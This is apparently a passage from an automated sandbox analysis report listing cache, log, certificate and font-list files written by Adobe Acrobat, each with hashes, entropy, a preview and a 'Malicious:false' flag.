                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):338
                                                                                                                                                                                                                                              Entropy (8bit):5.198458215989833
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:wJi7QL+q2P92nKuAl9Ombzo2jMGIFUt8XJieQG1Zmw+XJieQQLVkwO92nKuAl9OU:w7yv4HAa8uFUt8X75/+X7FR5LHAa8RJ
                                                                                                                                                                                                                                              MD5:1DA05BB9973030BF78A6E3144EADAB49
                                                                                                                                                                                                                                              SHA1:36FF6B6D70811698E3B03BCA109A2AC124A2B6E7
                                                                                                                                                                                                                                              SHA-256:649A5351DBFB8002D8D0A5880BD9E024C7349CA97012F7E63BE4F8DFBF84D10E
                                                                                                                                                                                                                                              SHA-512:4286C22AD10D69277EBCA09F192CE0DFB92111361EB9417D7C02965E5F1C39FF64F8C223556C7FDDD541123B8CC6923B24BBD7C816FD727525406037AEF292D3
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:2024/12/21-08:59:10.566 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/21-08:59:10.568 1d18 Recovering log #3.2024/12/21-08:59:10.568 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):508
                                                                                                                                                                                                                                              Entropy (8bit):5.047195090775108
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                                                                                                                                              MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                                                                                                                                              SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                                                                                                                                              SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                                                                                                                                              SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF6fdc69.TMP (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):508
                                                                                                                                                                                                                                              Entropy (8bit):5.047195090775108
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                                                                                                                                              MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                                                                                                                                              SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                                                                                                                                              SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                                                                                                                                              SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f5263cf5-e5cc-428f-8a32-8fb98fb1db80.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):508
                                                                                                                                                                                                                                              Entropy (8bit):5.047195090775108
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                                                                                                                                              MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                                                                                                                                              SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                                                                                                                                              SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                                                                                                                                              SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\f9c09503-28e7-4257-bbcb-d81425e1ba89.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):508
                                                                                                                                                                                                                                              Entropy (8bit):5.051804225401675
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:YH/um3RA8sqisBdOg2Hzgcaq3QYiubxnP7E4TfF+:Y2sRdsadMHzL3QYhbxP7np+
                                                                                                                                                                                                                                              MD5:DDB498FAE0B971C07E8B8094456C4FE7
                                                                                                                                                                                                                                              SHA1:47648A34730F42DFC7E484DE4C45C58D09F3933F
                                                                                                                                                                                                                                              SHA-256:49DB18BC7EB7F4D8AC2288EB893E42EEACCCDEABE999BF7F45AD3AD80649F118
                                                                                                                                                                                                                                              SHA-512:43CA9A032B092627321AB059A731F1548C7B271445618A5E2B11ED5C6E5F9041E64FB8B106754C47395E1F636EFD43625799B35A436CBFF6ACC44C99A6CE14C9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379349559244475","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":629227},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4099
                                                                                                                                                                                                                                              Entropy (8bit):5.228367526344799
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUWCHES:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLq
                                                                                                                                                                                                                                              MD5:2F984E9E52415CEC6B43D2F12D9A3181
                                                                                                                                                                                                                                              SHA1:3F5752D3A7EE0323FF50F6DBF308EC1384CF7BC5
                                                                                                                                                                                                                                              SHA-256:3450245DE31F10E9598A166D2372B82E51DEF039CA1C358BFBC7295255B450B3
                                                                                                                                                                                                                                              SHA-512:DE16044E5BC9FAFD83F8A0AA4DDD5567F535BF9502B7543116E30BD15D421A4BED8FC4E937BFB6649618B52E3D5D47A8E34AF5103D003F4AE52117FD0FF8791C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):326
                                                                                                                                                                                                                                              Entropy (8bit):5.1965697311137715
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:wJi6QL+q2P92nKuAl9OmbzNMxIFUt8XJiQG1Zmw+XJiQQLVkwO92nKuAl9OmbzNq:wEyv4HAa8jFUt8X+/+XGR5LHAa84J
                                                                                                                                                                                                                                              MD5:9E7BABA16942A0008E1FC3C617816B90
                                                                                                                                                                                                                                              SHA1:853E9CDD3B5E3D4C2FFDCD9EAF747D63643CD5DC
                                                                                                                                                                                                                                              SHA-256:FCF4B1A42A279728EFA4ADDE0780E39E7AD9445825AEDDEBF404A84B7C74EF11
                                                                                                                                                                                                                                              SHA-512:61B55999D6A30CE3505E69A703AF9EA30BFFA8725517E0BD81F12ADE34C412D6CB4849BED9D50E90099E353A08625A710EEF9DF2EDC6E1003E317F522B0C3BEB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:2024/12/21-08:59:10.750 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/21-08:59:10.752 1d18 Recovering log #3.2024/12/21-08:59:10.752 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):326
                                                                                                                                                                                                                                              Entropy (8bit):5.1965697311137715
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:wJi6QL+q2P92nKuAl9OmbzNMxIFUt8XJiQG1Zmw+XJiQQLVkwO92nKuAl9OmbzNq:wEyv4HAa8jFUt8X+/+XGR5LHAa84J
                                                                                                                                                                                                                                              MD5:9E7BABA16942A0008E1FC3C617816B90
                                                                                                                                                                                                                                              SHA1:853E9CDD3B5E3D4C2FFDCD9EAF747D63643CD5DC
                                                                                                                                                                                                                                              SHA-256:FCF4B1A42A279728EFA4ADDE0780E39E7AD9445825AEDDEBF404A84B7C74EF11
                                                                                                                                                                                                                                              SHA-512:61B55999D6A30CE3505E69A703AF9EA30BFFA8725517E0BD81F12ADE34C412D6CB4849BED9D50E90099E353A08625A710EEF9DF2EDC6E1003E317F522B0C3BEB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:2024/12/21-08:59:10.750 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/21-08:59:10.752 1d18 Recovering log #3.2024/12/21-08:59:10.752 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241221135916Z-226.bmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65110
                                                                                                                                                                                                                                              Entropy (8bit):1.5660255405159125
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:CqiWecVTs1o+o6DX7B8wOCknAhhhMCc8opQChqlohhhhhhhhhhhhhhhhxhhjhhhw:CqiWecVg1o+fDX7rknAhhhMCzo5hqlV
                                                                                                                                                                                                                                              MD5:B34ACB9DC146C155645C4C9A83E5E364
                                                                                                                                                                                                                                              SHA1:B14949991256F63C163946B479BB9BD511536472
                                                                                                                                                                                                                                              SHA-256:840AD703F8094E492DDC8601B3FE979888A767C6FEF10B311F1DACCD7957C531
                                                                                                                                                                                                                                              SHA-512:F14C81FC286431BB870A142B6D4652BA617742D965BCE96A7E455C67978C0FE3D5DFD21C660F5B276FA3390D5977A4DC5E2170CBB1B991AAC45737E326291CFF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1391
                                                                                                                                                                                                                                              Entropy (8bit):7.705940075877404
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                                                                                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                                                                                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                                                                                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                                                                                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):71954
                                                                                                                                                                                                                                              Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                                              Entropy (8bit):2.7895108629891827
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:kkFkl06ZEvfllXlE/HT8klxh1NNX8RolJuRdxLlGB9lQRYwpDdt:kKt6Z9T8sH7NMa8RdWBwRd
                                                                                                                                                                                                                                              MD5:568FE5DDCB0DEEBC1CE52088D62ADDDC
                                                                                                                                                                                                                                              SHA1:4FB2732C13577B6D989763E44EA8106B3C1EE374
                                                                                                                                                                                                                                              SHA-256:C2C47EE15B3DCFF82B2D524C41FDA16E6C2BA787D146AD5ABE0B9FDDC4E25EFD
                                                                                                                                                                                                                                              SHA-512:6D777CBF80AA7018D59E0DE3FA62C9943F835873253AA2A92BE9E634A74BE85AF91CA45BA71BA74B2539F171B26EBC68DB9ACECAABB2BA0A8C4E6C52E95037F4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... ...........S..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):328
                                                                                                                                                                                                                                              Entropy (8bit):3.247897867253902
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:kKvM9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HvDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                                                                                              MD5:898B5B01CAA167FF4DC5590C9AF269B4
                                                                                                                                                                                                                                              SHA1:603A6F31B519A39E63091F6B81661233ADAFBB7B
                                                                                                                                                                                                                                              SHA-256:81D2427AF4DC34DE5AFAF76471A04EDDF340400285E30F2C23BFBA2DDEE92006
                                                                                                                                                                                                                                              SHA-512:D25D02E4ACE5E6BDD2BCF2498BBC81620AF19274730C9AE60566D1D9EC9DA45FABF39FE0967B8890EE58C031D6F24EDD53E5E53301CE2E4A19BBC88339E36762
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:p...... .........^..S..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:PostScript document text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1233
                                                                                                                                                                                                                                              Entropy (8bit):5.233980037532449
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6648

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:PostScript document text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1233
                                                                                                                                                                                                                                              Entropy (8bit):5.233980037532449
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                                                              Malicious:false
